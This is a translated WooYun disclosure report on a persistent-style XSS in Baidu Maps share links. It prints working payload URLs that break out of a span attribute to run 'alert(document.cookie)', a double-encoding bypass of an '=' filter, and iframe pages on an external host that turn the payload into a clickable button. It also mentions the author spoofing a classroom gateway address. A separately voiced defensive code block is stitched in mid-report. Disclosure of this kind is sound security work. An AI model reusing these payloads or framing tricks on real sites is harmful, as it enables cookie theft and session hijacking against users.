
Vulnerability summary

Defect ID: wooyun-2014-073258

Title: Persistent XSS vulnerability in Baidu Maps

Vendor: Baidu

Author: q601333824

Submitted: 2014-08-21 10:18

Fixed: 2014-10-05 10:20

Published: 2014-10-05 10:20

Vulnerability type: XSS (cross-site scripting)

Severity: Low

Self-assessed Rank: 3

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-08-21: details sent to the vendor, awaiting vendor handling
2014-08-21: vendor confirmed; details visible to the vendor only
2014-08-31: details disclosed to core white hats and domain experts
2014-09-10: details disclosed to regular white hats
2014-09-20: details disclosed to intern white hats
2014-10-05: details disclosed to the public

Brief description:

In class today the teacher explained how ARP works, so I changed my IP address to the classroom gateway address. No idea whether it did anything.......

Detailed description:

1. Baidu Maps has a reflected XSS vulnerability, but when abused it can be turned into a persistent XSS.
2. The link containing the XSS:

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24


3. After decoding it becomes:

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


4. The link above comes from searching for a driving route and adding a waypoint at the location shown in the screenshot:

QQ截图20140821000220.png


5. If you type the code directly into this input box and then click Share, the request fails because no such place exists, and the returned page is empty, as shown:
(1) Enter the string in the input box

2.png


(2) The share result page is blank because the place does not exist.

空.png


---------------------------------------------------------------------------------------
6. Instead, search for a valid place first and then modify the parameter; the page is no longer cleared, as shown:
(1) Search for a valid, existing place

存在.png


(2) Then click "share location" to get the link:

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%24<!XSssssssssssssssS!>%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24


(3) Then replace <!XSssssssssssssssS!> above with the XSS code; the page is no longer cleared, as shown.
The <span> tag here does not filter double quotes, so an XSS vulnerability exists.

没清空.png


------------------------------------------------------------------------------------
7. My own guess is that the link fetches the coordinates of the place typed in the input box. When the place does not exist, no coordinates can be obtained and an error is returned, and the page is set to clear its content on error. So my guess is that if you first enter a valid place to obtain its coordinates and then modify the parameter, there is no effect.

http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav&navtp=2&c=179&drag=1&sc=179&ec=1474+to:1474&sy=0&sn=1$$$$13379315.6,3516515.34$$双牛大厦$$$$$$13379315.6,3516515.34$$&en=2$$50f7d146b1f3dac573210b8c$$13389510,3504432$$<!XSS!>$$0$$$$$$1$$+to:1$$$$13373704.98,3516060$$西湖区$$$$$$13373704.98,3516060$$


The parameters between the $$$$ markers are probably map coordinates (pure guesswork).
---------------------------------------------------------------------------------
8. As last time, if an equals sign is present the content is cleared, so encoding it twice avoids the clearing:

= → %3d →%253d


http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24
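The following is an added example, not code from the report or from Baidu; it models the two observations above (the <span> that does not encode double quotes, and the '=' check that double encoding gets past). The share link's s parameter is itself a URL-encoded query string, so the application has to decode the place name a second time; the constructed place-name segments, the decode-once filter and the span markup are assumptions about the mechanism, not the real implementation.

```javascript
// Constructed place-name segments: the part between '$$' markers that the user controls.
const BENIGN_NAME = '%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6';      // "双牛大厦", encoded once
const DOUBLE_ENCODED = '96315%22onmousemove%253D%22alert(1)%22'; // '=' encoded twice, '"' once

// The check the report's behaviour suggests (assumed): reject '=' after ONE decode.
// It sees '%3D', not '=', so a double-encoded value passes.
function naiveEqualsFilterAccepts(segment) {
  return !decodeURIComponent(segment).includes('=');
}

// What the page actually works with once the nested query string is decoded again.
function decodeTwice(segment) {
  return decodeURIComponent(decodeURIComponent(segment));
}

// Vulnerable sink (assumed shape): the name is interpolated into an attribute verbatim,
// so a '"' in the value closes the attribute and whatever follows becomes new attributes.
function renderUnsafe(name) {
  return `<span title="${name}">${name}</span>`;
}

// Hardened sink: encode the five HTML-significant characters at the point of output.
// This works whatever the value looked like on the way in, so no input blacklist is needed.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  const safe = escapeHtml(name);
  return `<span title="${safe}">${safe}</span>`;
}

// Detection helper for a review or test suite: inside the rendered markup, is the title
// attribute closed early by a '"' that is directly followed by an on* event handler?
function hasInjectedHandler(html) {
  const start = html.indexOf('title="') + 'title="'.length;
  return /"\s*on\w+\s*=/i.test(html.slice(start));
}
```

Running the two sinks on decodeTwice(DOUBLE_ENCODED) shows the unsafe one emitting an onmousemove attribute and the escaped one emitting only &quot; entities, while the benign name renders identically in both.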


9. The XSS here is too small for most people to notice, so I created two web pages with the following code:
(1)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>中转</title>
</head>
<body>
<iframe src="http://map.baidu.com/?newmap=1&shareurl=1&l=13&tn=B_NORMAL_MAP&c=13381480,3510185&s=nav%26navtp%3D2%26c%3D179%26drag%3D1%26sc%3D179%26ec%3D1474%2Bto%3A1474%26sy%3D0%26sn%3D1%24%24%24%2413379315.6%2C3516515.34%24%24%E5%8F%8C%E7%89%9B%E5%A4%A7%E5%8E%A6%24%24%24%24%24%2413379315.6%2C3516515.34%24%24%26en%3D2%24%2450f7d146b1f3dac573210b8c%24%2413389510%2C3504432%24%2496315%22onmousemove%253D%22alert(document.cookie)%22%24%240%24%24%24%24%24%241%24%24%2Bto%3A1%24%24%24%2413373704.98%2C3516060%24%24%E8%A5%BF%E6%B9%96%E5%8C%BA%24%24%24%24%24%2413373704.98%2C3516060%24%24" height="900" width="1000" style="position:absolute; left:-900px; top:-670px;"></iframe>
</body>
</html>


Effect of the first page, as shown:

修改1.png


(2)

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>存储型SS测试</title>
</head>
<body>
<marquee behavior="alternate">→→→→→→→→→→<iframe src="http://fripside.sinaapp.com/1.php" width="50" height="30" scrolling="no"></iframe>←←←←←←←←←←</marquee>
</body>
</html>


Combined with the first page, the effect of the second page, as shown:

修改2.png


10. Put simply, the first page adjusts the position and size of the XSS.
The first page's iframe has absolute positioning and cannot simply be moved, but the second page can be set to embed the first, and then the position can be adjusted freely.

11. Final effect: visit this link to see it. I added a scrolling effect so it could be placed on a website and used as a button:

http://fripside.sinaapp.com/2.php


12. Final effect screenshot

coo.png



Proof of vulnerability:

(1) and (2): the two pages are identical to those given in the detailed description above.


(3) Final effect screenshot

coo.png


(4) Visit this link to see the effect:

http://fripside.sinaapp.com/2.php

Suggested fix:

Filtering.

Copyright notice: please credit the source when reposting: q601333824@乌云


Vendor response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2014-08-21 16:52

Vendor reply:

Thank you for the submission; we will contact the business unit immediately to handle this issue.

Latest status:

None yet